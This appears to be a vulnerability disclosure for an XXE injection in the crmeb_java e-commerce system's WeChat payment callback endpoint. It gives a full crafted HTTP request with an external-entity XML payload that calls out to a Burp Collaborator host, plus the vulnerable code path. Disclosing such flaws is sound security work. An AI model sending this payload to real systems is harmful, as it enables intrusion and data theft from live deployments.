There is a XXE injection vulnerability in the crmeb_java system /api/admin/payment/callback/wechat #15
Description
[Suggested description]
There is a XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SaxReader component.
[Vulnerability Type]
XML External Entity (XXE) Injection
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
/api/admin/payment/callback/wechat
[Attack Type]
Remote
[Vulnerability details]
Send the crafted request package to the api interface /api/admin/payment/callback/wechat
POST /api/admin/payment/callback/wechat HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 239
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://3qurglf920zqknzhgryal9ip7gd61v.burpcollaborator.net/evil.xml" >]>
<return_code>&xxe;</return_code>
<return_msg><![CDATA[OK]]></return_msg>
[Impact Code execution]
true
[Cause of vulnerability]
The interface /api/admin/payment/callback/wechat calls the function weChat
If the xmlInfo is not blank, the function processResponseXml will be called.
Then it calls the function xmlToMap to process the xml.
There is a XXE Injection vulnerability with the SAXReader component.
That's all, thanks.